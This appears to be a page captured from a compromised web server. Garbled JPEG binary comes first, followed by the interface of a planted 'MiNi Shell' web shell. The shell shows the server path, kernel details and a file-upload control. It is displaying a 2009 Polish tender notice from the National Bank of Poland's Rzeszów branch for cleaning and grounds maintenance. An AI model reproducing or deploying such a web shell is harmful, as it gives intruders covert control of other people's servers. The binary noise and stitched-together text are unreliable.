JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090428/125114-N-2009.html

<p class="kh_header"><b>Rzeszów: Utrzymanie czystości i porządku wewnątrz oraz na zewnątrz obiektów Narodowego Banku Polskiego Oddziału Okręgowego w Rzeszowie</b><br>
<b>Numer ogłoszenia: 125114 - 2009; data zamieszczenia: 28.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Narodowy Bank Polski Oddział Okręgowy w Rzeszowie , ul. 3 Maja 12, 35-959 Rzeszów, woj. podkarpackie, tel. 017 8606247.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nbp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości i porządku wewnątrz oraz na zewnątrz obiektów Narodowego Banku Polskiego Oddziału Okręgowego w Rzeszowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług związanych z utrzymaniem czystości i porządku wewnątrz oraz na zewnątrz obiektów Oddziału Okręgowego Narodowego Banku Polskiego w Rzeszowie, przy czym:
 I część zamówienia dotyczy usług związanych z utrzymaniem czystości i porządku realizowanych wewnątrz i na zewnątrz obiektu NBP, przy ul. 3 -go Maja 12. Zakres, powierzchnie, i sposób świadczenia usług określa załącznik nr 1 do SIWZ pn. Opis przedmiotu zamówienia - I część zamówienia.
Zasadnicze rodzaje usług i powierzchnie objęte zakresem I części zamówienia są następujące:
1) utrzymanie czystości i porządku pomieszczeń wewnątrz budynku NBP o łącznej powierzchni 2 550,90 m2.
2) utrzymanie czystości i porządku pomieszczeń wewnątrz budynku NBP (tzw. usług       serwisowa).
3) zakup i wyposażanie w środki higieniczne i sanitarne węzłów sanitarnych, pokoi gościnnych, aneksów kuchennych, pokoi śniadań.
4) utrzymanie czystości i porządku na zewnątrz budynku NBP o łącznej powierzchni               1 695 m2 (obejmującej parkingi, place, ciągi pieszo-jezdne, dojazdy).            
5) utrzymanie i pielęgnacja zieleni, o łącznej powierzchni 275 m2, obok budynku NBP            (obejmującej trawniki, kwiaty, krzewy i rośliny iglaste).
6) mycie dwustronne okien i witryn: 466,08 m2.
7) czyszczenie wykładzin dywanowych 1 103,38 m2.
 II część zamówienia dotyczy usług związanych z utrzymaniem czystości i porządku realizowanych wewnątrz i na zewnątrz obiektu NBP przy al. Armii Krajowej 86. Zakres, powierzchnie, i sposób świadczenia usług określa załącznik nr 2 do SIWZ pn. Opis przedmiotu zamówienia - II część zamówienia.
Zasadnicze rodzaje usług i powierzchnie objęte zakresem I części zamówienia są następujące:
1) utrzymanie czystości i porządku pomieszczeń wewnątrz budynku NBP o łącznej powierzchni 2 036,87 m2 (obejmującej parkingi, place, ciągi pieszo-jezdne, dojazdy).            
2) utrzymanie czystości i porządku pomieszczeń wewnątrz budynku NBP (tzw. usługa serwisowa).
3) zakup i wyposażanie w środki higieniczne i sanitarne węzłów sanitarnych, pokoi gościnnych, Sali konferencyjnej, aneksów kuchennych, pokoi śniadań.
4) utrzymanie czystości i porządku na zewnątrz budynku NBP o łącznej powierzchni              2 035 m2 (obejmującej chodniki, parkingi, dziedziniec wewnętrzny, śluzy przejazdowe, zjazdy i dojazdy).
5) utrzymanie i pielęgnacja zieleni, o łącznej powierzchni 1 604 m2, wokół budynku NBP         (obejmującej trawniki, kwiaty, krzewy i rośliny iglaste).
6) mycie nieotwieranych okien, witryn i naświetli:
a)	od wewnątrz  278,10 m2,
b)	od zewnątrz   510,68 m2.
7) mycie dwustronne bram segmentowych i żaluzji rolowanych 200,28 m2. 
8) czyszczenie wykładzin dywanowych 333,80 m2.

Zamawiający przewiduje wizję lokalną, która w przypadku złożenia wniosków przez zainteresowanych, odbędzie się:
-	w obiekcie przy al. Armii Krajowej 86 w Rzeszowie, w dniu 05.05.2009r o godz. 1000, 
-	w obiekcie przy ul. 3-go Maja 12, w dniu 05.05.2009r o godz. 1200.
Wnioski należy dostarczyć do siedziby tutejszego Oddziału, przy ul 3-go Maja 12                   w Rzeszowie, najpóźniej na 1 dzień roboczy przed wyznaczonym terminem wizyty. Wnioski winny zawierać dane osobowe (imię i nazwisko, serię i nr dokumentu tożsamości) osób, które będą uczestniczyć w wizji lokalnej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.91.00.00-9, 90.91.13.00-9, 90.91.40.00-7, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2, 77.21.15.00-7, 77.30.00.00-3, 77.31.41.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane - dotyczy I i II części zamówienia<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  W zakresie dotyczącym I części zamówienia o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają poniższe warunki: 
1)  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
 2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.: 
- dysponują co najmniej 4 osobami, które będą wykonywać zamówienie, posiadającymi co najmniej sześciomiesięczną praktykę w zakresie wykonywania czynności objętych przedmiotem zamówienia oraz co najmniej 1 osobą do koordynacji i nadzoru czynności objętych przedmiotem zamówienia,
- dysponują niezbędnymi do wykonania zamówienia narzędziami i urządzeniami,       o których mowa w załączniku nr 11 do SIWZ,  

3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.
2. W zakresie dotyczącym II części zamówienia o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają poniższe warunki:
1)  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
 2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.: 
- dysponują co najmniej 4 osobami, które będą wykonywać zamówienie, posiadającymi co najmniej sześciomiesięczną praktykę w zakresie wykonywania czynności objętych przedmiotem zamówienia oraz co najmniej 1 osobą do koordynacji i nadzoru czynności objętych przedmiotem zamówienia,
- dysponują niezbędnymi do wykonania zamówienia narzędziami i urządzeniami, o których mowa w załączniku nr 12 do SIWZ, 
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.
Dla potwierdzenia spełniania powyższych warunków wykonawca obowiązany jest złożyć wszystkie oświadczenia i dokumenty wymienione w pkt. VI SIWZ - dotyczy części I i II zamówienia.
Ocena spełnienia powyższych warunków będzie dokonywana metodą 0 - 1, tj. spełnia lub nie spełnia, w oparciu o dokumenty i oświadczenia dołączone do oferty, wymienione       w pkt. VI SIWZ. Wykonawcy niespełniający powyższych warunków zostaną przez zamawiającego wykluczeni z niniejszego postępowania a ich oferty zostaną uznane za odrzucone..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W zakresie dotyczącym I części zamówienia w celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca musi wraz z ofertą złożyć następujące dokumenty: 
1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż       6 miesięcy przed upływem terminu składania ofert.
2. Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenia na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu                       - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
3. Oświadczenie, że Wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia i które posiadają niezbędne  doświadczenie  tj. co najmniej sześciomiesięczną praktykę w zakresie wykonywania czynności objętych przedmiotem zamówienia - według wzoru stanowiącego załącznik nr 9 do SIWZ. 
4. Pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, na potwierdzenie, że Wykonawca będzie dysponował takimi osobami (jeżeli taki przypadek wystąpi). 
5. Wykaz narzędzi i urządzeń, którymi dysponuje lub będzie dysponował Wykonawca        - według wzoru stanowiącego załącznik nr 11 do SIWZ. 
6. Pisemne zobowiązania innych podmiotów do udostępnienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt. 5, Wykonawca wskazał narzędzia i urządzenia, którymi Wykonawca będzie dysponował. 
7. Oświadczenie o spełnianiu warunków określonych w art. 22, ust.1 ustawy - według wzoru stanowiącego załącznik nr 7 do SIWZ. 
8. Polisę lub inny dokument (w przypadku braku polisy) potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na wartość nie mniejszą niż 100.000,00 zł. 
9. Jeżeli oferta podpisywana będzie przez pełnomocnika do oferty należy załączyć pełnomocnictwo (pełnomocnictwa) w formie oryginału lub notarialnie poświadczonej kopii, albo kopii poświadczonej za zgodność z oryginałem przez osoby udzielające pełnomocnictwa, przy czym dotyczy to również przypadków składania ofert przez podmioty występujące wspólnie, czyli uczestników konsorcjum. 
W zakresie dotyczącym II części zamówienia w celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca musi wraz z ofertą złożyć następujące dokumenty:
 1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż          6 miesięcy przed upływem terminu składania ofert. 
2. Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenia na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu                       - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
3. Oświadczenie, że Wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia i które posiadają niezbędne  doświadczenie  tj. co najmniej sześciomiesięczną praktykę w zakresie wykonywania czynności objętych przedmiotem zamówienia - według wzoru stanowiącego załącznik nr 10 do SIWZ. 
4. Pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, na potwierdzenie, że Wykonawca będzie dysponował takimi osobami (jeżeli taki przypadek wystąpi). 
5. Wykaz narzędzi i urządzeń, którymi dysponuje lub będzie dysponował Wykonawca        - według wzoru stanowiącego załącznik nr 12 do SIWZ. 
6. Pisemne zobowiązania innych podmiotów do udostępnienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt. 5, Wykonawca wskazał narzędzia i urządzenia, którymi Wykonawca będzie dysponował. 
7. Oświadczenie o spełnianiu warunków określonych w art. 22 ust.1 ustawy - według wzoru stanowiącego załącznik nr 8 do SIWZ. 
8. Polisę lub inny dokument (w przypadku braku polisy) potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na wartość nie mniejszą niż 100.000,00 zł. 
9. Jeżeli oferta podpisywana będzie przez pełnomocnika do oferty należy załączyć pełnomocnictwo (pełnomocnictwa) w formie oryginału lub notarialnie poświadczonej kopii, albo kopii poświadczonej za zgodność z oryginałem przez osoby udzielające pełnomocnictwa, przy czym dotyczy to również przypadków składania ofert przez podmioty występujące wspólnie, czyli uczestników konsorcjum..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.nbp.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Narodowy Bank Polski Oddział Okręgowy w Rzeszowie, ul. 3-go Maja 12, 35-959 Rzeszów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2009 godzina 12:00, miejsce: Narodowy Bank Polski Oddział Okręgowy           w Rzeszowie, ul. 3-go Maja 12, 35-959 Rzeszów, sekretariat, pokój 205, II piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie czystości i porządku wewnątrz oraz na zewnątrz obiektu Oddziału Okręgowego Narodowego Banku Polskiego w Rzeszowie, przy ul. 3-go Maja 12.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I część zamówienia dotyczy usług związanych z utrzymaniem czystości i porządku realizowanych wewnątrz i na zewnątrz obiektu NBP, przy ul. 3 -go Maja 12. Zakres, powierzchnie, i sposób świadczenia usług określa załącznik nr 1 do SIWZ pn. Opis przedmiotu zamówienia - I część zamówienia.
Zasadnicze rodzaje usług i powierzchnie objęte zakresem I części zamówienia są następujące:
1) utrzymanie czystości i porządku pomieszczeń wewnątrz budynku NBP o łącznej powierzchni 2 550,90 m2.
2) utrzymanie czystości i porządku pomieszczeń wewnątrz budynku NBP (tzw. usług       serwisowa).
3) zakup i wyposażanie w środki higieniczne i sanitarne węzłów sanitarnych, pokoi gościnnych, aneksów kuchennych, pokoi śniadań.
4) utrzymanie czystości i porządku na zewnątrz budynku NBP o łącznej powierzchni               1 695 m2 (obejmującej parkingi, place, ciągi pieszo-jezdne, dojazdy).            
5) utrzymanie i pielęgnacja zieleni, o łącznej powierzchni 275 m2, obok budynku NBP            (obejmującej trawniki, kwiaty, krzewy i rośliny iglaste).
6) mycie dwustronne okien i witryn: 466,08 m2.
7) czyszczenie wykładzin dywanowych 1 103,38 m2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.91.00.00-9, 90.91.40.00-7, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2, 77.21.15.00-7, 77.30.00.00-3, 77.31.41.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymanie czystości i porządku wewnątrz oraz na zewnątrz obiektu Oddziału Okręgowego Narodowego Banku Polskiego w Rzeszowie, przy al. Armii Krajowej 86.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> II część zamówienia dotyczy usług związanych z utrzymaniem czystości i porządku realizowanych wewnątrz i na zewnątrz obiektu NBP przy al. Armii Krajowej 86. Zakres, powierzchnie, i sposób świadczenia usług określa załącznik nr 2 do SIWZ pn. Opis przedmiotu zamówienia - II część zamówienia
Zasadnicze rodzaje usług i powierzchnie objęte zakresem I części zamówienia są następujące:
1) utrzymanie czystości i porządku pomieszczeń wewnątrz budynku NBP o łącznej powierzchni 2 036,87 m2 (obejmującej parkingi, place, ciągi pieszo-jezdne, dojazdy).            
2) utrzymanie czystości i porządku pomieszczeń wewnątrz budynku NBP (tzw. usługa serwisowa).
3) zakup i wyposażanie w środki higieniczne i sanitarne węzłów sanitarnych, pokoi gościnnych, Sali konferencyjnej, aneksów kuchennych, pokoi śniadań.
4) utrzymanie czystości i porządku na zewnątrz budynku NBP o łącznej powierzchni              2 035 m2 (obejmującej chodniki, parkingi, dziedziniec wewnętrzny, śluzy przejazdowe, zjazdy i dojazdy).
5) utrzymanie i pielęgnacja zieleni, o łącznej powierzchni 1 604 m2, wokół budynku NBP         (obejmującej trawniki, kwiaty, krzewy i rośliny iglaste).
6) mycie nieotwieranych okien, witryn i naświetli:
a)	od wewnątrz  278,10 m2,
b)	od zewnątrz   510,68 m2.
7) mycie dwustronne bram segmentowych i żaluzji rolowanych 200,28 m2. 
8) czyszczenie wykładzin dywanowych 333,80 m2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.91.00.00-9, 90.91.13.00-9, 90.91.40.00-7, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2, 77.21.15.00-7, 77.30.00.00-3, 77.31.41.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com